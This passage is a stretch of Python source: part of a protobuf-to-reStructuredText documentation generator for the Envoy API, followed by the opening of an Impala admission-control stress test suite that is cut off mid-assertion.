# path: a list of path indexes as per
# https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
# Extended as nested objects are traversed.
self.path = []
# Message/enum/field name. Extended as nested objects are traversed.
self.name = name
# Map from type name to the correct type annotation string, e.g. from
# ".envoy.api.v2.Foo.Bar" to "map<string, string>". This is lost during
# proto synthesis and is dynamically recovered in FormatMessage.
self.map_typenames = {}
# Map from a message's oneof index to the fields sharing a oneof.
self.oneof_fields = {}
# Map from a message's oneof index to the "required" bool property.
self.oneof_required = {}
self.type_name = 'file'
def _Extend(self, path, type_name, name):
if not self.name:
extended_name = name
else:
extended_name = '%s.%s' % (self.name, name)
extended = TypeContext(self.source_code_info, extended_name)
extended.path = self.path + path
extended.type_name = type_name
extended.map_typenames = self.map_typenames.copy()
extended.oneof_fields = self.oneof_fields.copy()
extended.oneof_required = self.oneof_required.copy()
return extended
def ExtendMessage(self, index, name):
"""Extend type context with a message.
Args:
index: message index in file.
name: message name.
"""
return self._Extend([4, index], 'message', name)
def ExtendNestedMessage(self, index, name):
"""Extend type context with a nested message.
Args:
index: nested message index in message.
name: message name.
"""
return self._Extend([3, index], 'message', name)
def ExtendField(self, index, name):
"""Extend type context with a field.
Args:
index: field index in message.
name: field name.
"""
return self._Extend([2, index], 'field', name)
def ExtendEnum(self, index, name):
"""Extend type context with an enum.
Args:
index: enum index in file.
name: enum name.
"""
return self._Extend([5, index], 'enum', name)
def ExtendNestedEnum(self, index, name):
"""Extend type context with a nested enum.
Args:
index: enum index in message.
name: enum name.
"""
return self._Extend([4, index], 'enum', name)
def ExtendEnumValue(self, index, name):
"""Extend type context with an enum enum.
Args:
index: enum value index in enum.
name: value name.
"""
return self._Extend([2, index], 'enum_value', name)
def LeadingCommentPathLookup(self):
return self.source_code_info.LeadingCommentPathLookup(
self.path, self.type_name)
def GithubUrl(self):
return self.source_code_info.GithubUrl(self.path)
def MapLines(f, s):
"""Apply a function across each line in a flat string.
Args:
f: A string transform function for a line.
s: A string consisting of potentially multiple lines.
Returns:
A flat string with f applied to each line.
"""
return '\n'.join(f(line) for line in s.split('\n'))
def Indent(spaces, line):
"""Indent a string."""
return ' ' * spaces + line
def IndentLines(spaces, lines):
"""Indent a list of strings."""
return map(functools.partial(Indent, spaces), lines)
def FormatInternalLink(text, ref):
return ':ref:`%s <%s>`' % (text, ref)
def FormatExternalLink(text, ref):
return '`%s <%s>`_' % (text, ref)
def FormatHeader(style, text):
"""Format RST header.
Args:
style: underline style, e.g. '=', '-'.
text: header text
Returns:
RST formatted header.
"""
return '%s\n%s\n\n' % (text, style * len(text))
def FormatHeaderFromFile(style, file_level_comment, alt):
"""Format RST header based on special file level title
Args:
style: underline style, e.g. '=', '-'.
file_level_comment: detached comment at top of file.
alt: If the file_level_comment does not contain a user
specified title, use the alt text as page title.
Returns:
RST formatted header, and file level comment without page title strings.
"""
anchor = FormatAnchor(FileCrossRefLabel(alt))
stripped_comment, annotations = ExtractAnnotations(file_level_comment)
if DOC_TITLE_ANNOTATION in annotations:
return anchor + FormatHeader(
style, annotations[DOC_TITLE_ANNOTATION]), stripped_comment
return anchor + FormatHeader(style, alt), stripped_comment
def FormatFieldTypeAsJson(type_context, field):
"""Format FieldDescriptorProto.Type as a pseudo-JSON string.
Args:
type_context: contextual information for message/enum/field.
field: FieldDescriptor proto.
Return:
RST formatted pseudo-JSON string representation of field type.
"""
if NormalizeFQN(field.type_name) in type_context.map_typenames:
return '"{...}"'
if field.label == field.LABEL_REPEATED:
return '[]'
if field.type == field.TYPE_MESSAGE:
return '"{...}"'
return '"..."'
def FormatMessageAsJson(type_context, msg):
"""Format a message definition DescriptorProto as a pseudo-JSON block.
Args:
type_context: contextual information for message/enum/field.
msg: message definition DescriptorProto.
Return:
RST formatted pseudo-JSON string representation of message definition.
"""
lines = []
for index, field in enumerate(msg.field):
field_type_context = type_context.ExtendField(index, field.name)
leading_comment, comment_annotations = field_type_context.LeadingCommentPathLookup(
)
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
continue
lines.append('"%s": %s' % (field.name,
FormatFieldTypeAsJson(type_context, field)))
if lines:
return '.. code-block:: json\n\n {\n' + ',\n'.join(IndentLines(
4, lines)) + '\n }\n\n'
else:
return '.. code-block:: json\n\n {}\n\n'
def NormalizeFQN(fqn):
"""Normalize a fully qualified field type name.
Strips leading ENVOY_API_NAMESPACE_PREFIX and ENVOY_PREFIX and makes pretty wrapped type names.
Args:
fqn: a fully qualified type name from FieldDescriptorProto.type_name.
Return:
Normalized type name.
"""
if fqn.startswith(ENVOY_API_NAMESPACE_PREFIX):
return fqn[len(ENVOY_API_NAMESPACE_PREFIX):]
if fqn.startswith(ENVOY_PREFIX):
return fqn[len(ENVOY_PREFIX):]
return fqn
def FormatEmph(s):
"""RST format a string for emphasis."""
return '*%s*' % s
def FormatFieldType(type_context, field):
"""Format a FieldDescriptorProto type description.
Adds cross-refs for message types.
TODO(htuch): Add cross-refs for enums as well.
Args:
type_context: contextual information for message/enum/field.
field: FieldDescriptor proto.
Return:
RST formatted field type.
"""
if field.type_name.startswith(ENVOY_API_NAMESPACE_PREFIX) or field.type_name.startswith(ENVOY_PREFIX):
type_name = NormalizeFQN(field.type_name)
if field.type == field.TYPE_MESSAGE:
if type_context.map_typenames and type_name in type_context.map_typenames:
return type_context.map_typenames[type_name]
return FormatInternalLink(type_name, MessageCrossRefLabel(type_name))
if field.type == field.TYPE_ENUM:
return FormatInternalLink(type_name, EnumCrossRefLabel(type_name))
elif field.type_name.startswith(WKT_NAMESPACE_PREFIX):
wkt = field.type_name[len(WKT_NAMESPACE_PREFIX):]
return FormatExternalLink(
wkt,
'https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#%s'
% wkt.lower())
elif field.type_name.startswith(RPC_NAMESPACE_PREFIX):
rpc = field.type_name[len(RPC_NAMESPACE_PREFIX):]
return FormatExternalLink(
rpc,
'https://cloud.google.com/natural-language/docs/reference/rpc/google.rpc#%s'
% rpc.lower())
elif field.type_name:
return field.type_name
pretty_type_names = {
field.TYPE_DOUBLE: 'double',
field.TYPE_FLOAT: 'float',
field.TYPE_INT32: 'int32',
field.TYPE_SFIXED32: 'int32',
field.TYPE_SINT32: 'int32',
field.TYPE_FIXED32: 'uint32',
field.TYPE_UINT32: 'uint32',
field.TYPE_INT64: 'int64',
field.TYPE_SFIXED64: 'int64',
field.TYPE_SINT64: 'int64',
field.TYPE_FIXED64: 'uint64',
field.TYPE_UINT64: 'uint64',
field.TYPE_BOOL: 'bool',
field.TYPE_STRING: 'string',
field.TYPE_BYTES: 'bytes',
}
if field.type in pretty_type_names:
return FormatExternalLink(
pretty_type_names[field.type],
'https://developers.google.com/protocol-buffers/docs/proto#scalar')
raise ProtodocError('Unknown field type ' + str(field.type))
def StripLeadingSpace(s):
"""Remove leading space in flat comment strings."""
return MapLines(lambda s: s[1:], s)
def FileCrossRefLabel(msg_name):
"""File cross reference label."""
return 'envoy_api_file_%s' % msg_name
def MessageCrossRefLabel(msg_name):
"""Message cross reference label."""
return 'envoy_api_msg_%s' % msg_name
def EnumCrossRefLabel(enum_name):
"""Enum cross reference label."""
return 'envoy_api_enum_%s' % enum_name
def FieldCrossRefLabel(field_name):
"""Field cross reference label."""
return 'envoy_api_field_%s' % field_name
def EnumValueCrossRefLabel(enum_value_name):
"""Enum value cross reference label."""
return 'envoy_api_enum_value_%s' % enum_value_name
def FormatAnchor(label):
"""Format a label as an Envoy API RST anchor."""
return '.. _%s:\n\n' % label
def FormatFieldAsDefinitionListItem(outer_type_context, type_context, field):
"""Format a FieldDescriptorProto as RST definition list item.
Args:
outer_type_context: contextual information for enclosing message.
type_context: contextual information for message/enum/field.
field: FieldDescriptorProto.
Returns:
RST formatted definition list item.
"""
if field.HasField('oneof_index'):
oneof_template = '\nPrecisely one of %s must be set.\n' if type_context.oneof_required[
field.oneof_index] else '\nOnly one of %s may be set.\n'
oneof_comment = oneof_template % ', '.join(
FormatInternalLink(
f, FieldCrossRefLabel(outer_type_context.ExtendField(0, f).name))
for f in type_context.oneof_fields[field.oneof_index])
else:
oneof_comment = ''
anchor = FormatAnchor(FieldCrossRefLabel(type_context.name))
annotations = []
if field.options.HasExtension(validate_pb2.rules):
rule = field.options.Extensions[validate_pb2.rules]
if ((rule.HasField('message') and rule.message.required) or
(rule.HasField('string') and rule.string.min_bytes > 0) or
(rule.HasField('repeated') and rule.repeated.min_items > 0)):
annotations.append('*REQUIRED*')
leading_comment, comment_annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
return ''
comment = '(%s) ' % ', '.join(
[FormatFieldType(type_context, field)] + annotations) + leading_comment
return anchor + field.name + '\n' + MapLines(
functools.partial(Indent, 2), comment + oneof_comment)
def FormatMessageAsDefinitionList(type_context, msg):
"""Format a DescriptorProto as RST definition list.
Args:
type_context: contextual information for message/enum/field.
msg: DescriptorProto.
Returns:
RST formatted definition list item.
"""
type_context.oneof_fields = defaultdict(list)
type_context.oneof_required = defaultdict(bool)
for index, field in enumerate(msg.field):
if field.HasField('oneof_index'):
_, comment_annotations = type_context.ExtendField(
index, field.name).LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in comment_annotations:
continue
type_context.oneof_fields[field.oneof_index].append(field.name)
for index, oneof_decl in enumerate(msg.oneof_decl):
if oneof_decl.options.HasExtension(validate_pb2.required):
type_context.oneof_required[index] = oneof_decl.options.Extensions[
validate_pb2.required]
return '\n'.join(
FormatFieldAsDefinitionListItem(
type_context, type_context.ExtendField(index, field.name), field)
for index, field in enumerate(msg.field)) + '\n'
def FormatMessage(type_context, msg):
"""Format a DescriptorProto as RST section.
Args:
type_context: contextual information for message/enum/field.
msg: DescriptorProto.
Returns:
RST formatted section.
"""
# Skip messages synthesized to represent map types.
if msg.options.map_entry:
return ''
# We need to do some extra work to recover the map type annotation from the
# synthesized messages.
type_context.map_typenames = {
'%s.%s' % (type_context.name, nested_msg.name): 'map<%s, %s>' % tuple(
map(
functools.partial(FormatFieldType, type_context),
nested_msg.field))
for nested_msg in msg.nested_type
if nested_msg.options.map_entry
}
nested_msgs = '\n'.join(
FormatMessage(
type_context.ExtendNestedMessage(index, nested_msg.name), nested_msg)
for index, nested_msg in enumerate(msg.nested_type))
nested_enums = '\n'.join(
FormatEnum(
type_context.ExtendNestedEnum(index, nested_enum.name), nested_enum)
for index, nested_enum in enumerate(msg.enum_type))
anchor = FormatAnchor(MessageCrossRefLabel(type_context.name))
header = FormatHeader('-', type_context.name)
proto_link = FormatExternalLink('[%s proto]' % type_context.name,
type_context.GithubUrl()) + '\n\n'
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
return anchor + header + proto_link + leading_comment + FormatMessageAsJson(
type_context, msg) + FormatMessageAsDefinitionList(
type_context, msg) + nested_msgs + '\n' + nested_enums
def FormatEnumValueAsDefinitionListItem(type_context, enum_value):
"""Format a EnumValueDescriptorProto as RST definition list item.
Args:
type_context: contextual information for message/enum/field.
enum_value: EnumValueDescriptorProto.
Returns:
RST formatted definition list item.
"""
anchor = FormatAnchor(EnumValueCrossRefLabel(type_context.name))
default_comment = '*(DEFAULT)* ' if enum_value.number == 0 else ''
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
comment = default_comment + UNICODE_INVISIBLE_SEPARATOR + leading_comment
return anchor + enum_value.name + '\n' + MapLines(
functools.partial(Indent, 2), comment)
def FormatEnumAsDefinitionList(type_context, enum):
"""Format a EnumDescriptorProto as RST definition list.
Args:
type_context: contextual information for message/enum/field.
enum: DescriptorProto.
Returns:
RST formatted definition list item.
"""
return '\n'.join(
FormatEnumValueAsDefinitionListItem(
type_context.ExtendEnumValue(index, enum_value.name), enum_value)
for index, enum_value in enumerate(enum.value)) + '\n'
def FormatEnum(type_context, enum):
"""Format an EnumDescriptorProto as RST section.
Args:
type_context: contextual information for message/enum/field.
enum: EnumDescriptorProto.
Returns:
RST formatted section.
"""
anchor = FormatAnchor(EnumCrossRefLabel(type_context.name))
header = FormatHeader('-', 'Enum %s' % type_context.name)
proto_link = FormatExternalLink('[%s proto]' % type_context.name,
type_context.GithubUrl()) + '\n\n'
leading_comment, annotations = type_context.LeadingCommentPathLookup()
if NOT_IMPLEMENTED_HIDE_ANNOTATION in annotations:
return ''
return anchor + header + proto_link + leading_comment + FormatEnumAsDefinitionList(
type_context, enum)
def FormatProtoAsBlockComment(proto):
"""Format as RST a proto as a block comment.
Useful in debugging, not usually referenced.
"""
return '\n\nproto::\n\n' + MapLines(functools.partial(Indent, 2),
str(proto)) + '\n'
def GenerateRst(proto_file):
"""Generate a RST representation from a FileDescriptor proto."""
source_code_info = SourceCodeInfo(proto_file.name,
proto_file.source_code_info)
# Find the earliest detached comment, attribute it to file level.
# Also extract file level titles if any.
header, comment = FormatHeaderFromFile(
'=', source_code_info.file_level_comment, proto_file.name)
package_prefix = NormalizeFQN('.' + proto_file.package + '.')[:-1]
package_type_context = TypeContext(source_code_info, package_prefix)
msgs = '\n'.join(
FormatMessage(package_type_context.ExtendMessage(index, msg.name), msg)
for index, msg in enumerate(proto_file.message_type))
enums = '\n'.join(
FormatEnum(package_type_context.ExtendEnum(index, enum.name), enum)
for index, enum in enumerate(proto_file.enum_type))
debug_proto = FormatProtoAsBlockComment(proto_file)
return header + comment + msgs + enums # + debug_proto
def Main():
# http://www.expobrain.net/2015/09/13/create-a-plugin-for-google-protocol-buffer/
request = plugin_pb2.CodeGeneratorRequest()
request.ParseFromString(sys.stdin.read())
response = plugin_pb2.CodeGeneratorResponse()
cprofile_enabled = os.getenv('CPROFILE_ENABLED')
for proto_file in request.proto_file:
f = response.file.add()
f.name = proto_file.name + '.rst'
if cprofile_enabled:
pr = cProfile.Profile()
pr.enable()
# We don't actually generate any RST right now, we just string dump the
# input proto file descriptor into the output file.
f.content = GenerateRst(proto_file)
if cprofile_enabled:
pr.disable()
stats_stream = StringIO.StringIO()
ps = pstats.Stats(pr, stream=stats_stream).sort_stats(os.getenv('CPROFILE_SORTBY', 'cumulative'))
stats_file = response.file.add()
stats_file.name = proto_file.name + '.rst.profile'
ps.print_stats()
stats_file.content = stats_stream.getvalue()
sys.stdout.write(response.SerializeToString())
if __name__ == '__main__':
Main()
|
|
#!/usr/bin/env python
# Copyright (c) 2014 Cloudera, Inc. All rights reserved.
# Tests admission control
import pytest
import threading
import re
from time import sleep, time
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_single_exec_option_dimension
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.test_vector import TestDimension
import logging
import os
LOG = logging.getLogger('admission_test')
# We set a WAIT debug action so it doesn't complete the execution of this query. The
# limit is a parameter for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = "select * from alltypes limit %s"
# Time to sleep (in milliseconds) between issuing queries. The default statestore
# heartbeat is 500ms, so the lower the delay the more we can submit before the global
# state is updated. When the delay is at least the statestore heartbeat frequency, all
# state should be visible by every impalad by the time the next query is submitted.
SUBMISSION_DELAY_MS = [0, 50, 100, 600]
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# The statestore heartbeat of the impala cluster the test is executing against
STATESTORE_HEARTBEAT_MS = 500
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 100000 * 1024 * 1024
_STATESTORED_ARGS = "-statestore_heartbeat_frequency_ms=%s" % (STATESTORE_HEARTBEAT_MS)
def impalad_admission_ctrl_flags(max_requests, max_queued, mem_limit):
return ("-vmodule admission-controller=3 -default_pool_max_requests %s "
"-default_pool_max_queued %s -default_pool_mem_limit %s" %\
(max_requests, max_queued, mem_limit))
def impalad_admission_ctrl_config_args():
impalad_home = os.environ['IMPALA_HOME']
resources_dir = os.path.join(impalad_home, "fe", "src", "test", "resources")
fs_allocation_path = os.path.join(resources_dir, "fair-scheduler-test2.xml")
llama_site_path = os.path.join(resources_dir, "llama-site-test2.xml")
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s" % (fs_allocation_path, llama_site_path))
def log_metrics(log_prefix, metrics, log_level=logging.DEBUG):
LOG.log(log_level, "%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "\
"completed=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['completed'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1, metric_names):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in metric_names)
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (pool_name, metric_name)
class TestAdmissionController(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionController, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.TestMatrix.add_dimension(create_uncompressed_text_dimension(cls.get_workload()))
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(),
statestored_args=_STATESTORED_ARGS)
def test_set_request_pool(self, vector):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool (IMPALA-1050)."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
for pool in ['', 'not_a_pool_name']:
expected_error =\
"No mapping found for request from user '\w+' with requested pool '%s'"\
% (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\w+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
client.execute("select 1") # Query should execute in queueB
finally:
client.close()
class TestAdmissionControllerStress(TestAdmissionController):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. The queries are set with the WAIT debug action so that we have more control
over the state that the admission controller uses to make decisions. Each query is
submitted on a separate thread. Depending on the test parameters a varying number of
queries will be admitted, queued, and rejected. Once queries are admitted, the query
execution blocks and we can cancel the query in order to allow another queued query to
be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Cancel the currently running queries (they are blocked with the WAIT debug action)
and verify the metric for the number of completed queries. The threads that
submitted those queries should complete.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
fetch() the results (which will block).
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(TestDimension('num_queries', *NUM_QUERIES))
cls.TestMatrix.add_dimension(
TestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.TestMatrix.add_dimension(
TestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
if cls.exploration_strategy() == 'core':
cls.TestMatrix.add_constraint(lambda v: v.get_value('submission_delay_ms') == 0)
cls.TestMatrix.add_constraint(lambda v: v.get_value('num_queries') == 30)
cls.TestMatrix.add_constraint(\
lambda v: v.get_value('round_robin_submission') == True)
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'completed', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected' : 0,
'completed': 0, 'timed-out': 0}
for impalad in self.impalads:
for short_name in metrics.keys():
metrics[short_name] += impalad.service.get_metric_value(\
metric_key(self.pool_name, 'local-%s' % short_name), 0)
return metrics
def wait_for_metric_changes(self, metric_names, initial, expected_delta, timeout=30):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial, metric_names)
delta_sum = sum([ deltas[x] for x in metric_names ])
LOG.debug("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",\
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.debug("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for metrics" % (timeout,)
sleep(1)
def wait_for_heartbeats(self, heartbeats, timeout=30):
"""Waits for a number of statestore heartbeats from all impalads."""
start_time = time()
num_impalads = len(self.impalads)
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(\
'statestore-subscriber.heartbeat-interval-time')['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_heartbeats: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(\
'statestore-subscriber.heartbeat-interval-time')['count']
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for heartbeats" % (timeout,)
sleep(0.5)
LOG.debug("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads, timeout=30):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.debug("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < timeout),\
"Timed out waiting %s seconds for %s admitted client rpcs to return" %\
(timeout, num_threads)
sleep(0.1)
LOG.debug("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def cancel_admitted_queries(self, num_queries):
"""
Cancels queries on threads that are currently blocked on query execution.
"""
assert len(self.executing_threads) >= num_queries
LOG.debug("Cancelling %s queries", num_queries)
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.debug("Cancelling query %s", thread.query_num)
# The other thread sets the query_state before appending itself to the list,
# and will not change its state until it is cancelled by this thread.
assert thread.query_state == 'ADMITTED'
client = thread.impalad.service.create_beeswax_client()
try:
cancel_result = client.cancel(thread.query_handle)
assert cancel_result.status_code == 0,\
'Unexpected status code from cancel request: %s' % cancel_result
# Wait for the query to be cancelled and return
thread.join(20)
LOG.debug("Cancelled admitted query %s %s",
thread.query_num, "TIMED OUT" if thread.isAlive() else "")
assert not thread.isAlive()
assert thread.query_state == 'COMPLETED'
finally:
client.close()
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options['debug_action'] = '0:GETNEXT:WAIT'
exec_options.update(self.additional_query_options)
query = QUERY % (self.query_num,)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
LOG.debug("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
except ImpalaBeeswaxException as e:
if "Rejected" in str(e):
LOG.debug("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
return
elif "exceeded timeout" in str(e):
LOG.debug("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
return
else:
raise e
finally:
self.lock.release()
LOG.debug("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
try:
# fetch() will block until we cancel the query from the main thread
# (unless an unexpected error occurs). If an error occurs on the main therad,
# it is possible that teardown() cancels this query before we call fetch(). In
# that case a different exception is thrown and we handle it gracefully.
client.fetch(query, self.query_handle)
# The cancelled query may occasionally return with an OK status (IMPALA-1047).
self.query_state = 'COMPLETED'
self.query_handle = None
except ImpalaBeeswaxException as e:
if "Cancelled" in str(e):
LOG.debug("Query %s completed", self.query_num)
self.query_state = 'COMPLETED'
self.query_handle = None
elif "Invalid or unknown query handle" in str(e):
# May happen if the test is being torn down early (i.e. an error occurred).
LOG.debug("Query %s already cancelled in test shutdown.")
else:
raise e
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.debug("Thread terminating in state=%s", self.query_state)
if client is not None:
client.close()
def run_admission_test(self, vector, additional_query_options):
LOG.debug("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics();
log_metrics("Initial metrics: ", initial_metrics);
# Want query_num to start at 1 because this gets used as the limit in the query to
# help debugging (we can associate a running query with a thread). If we start at 0,
# that query would be evaluated as a constant expression and never hit the WAIT debug
# action.
for query_num in xrange(1, num_queries + 1):
impalad = self.impalads[query_num % len(self.impalads)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for all of the queries to be admitted, queued, or rejected (as reported
# by the impalad metrics).
LOG.debug("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(\
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the threads that submitted the queries to start executing
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads)
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
assert metric_deltas['rejected'] ==\
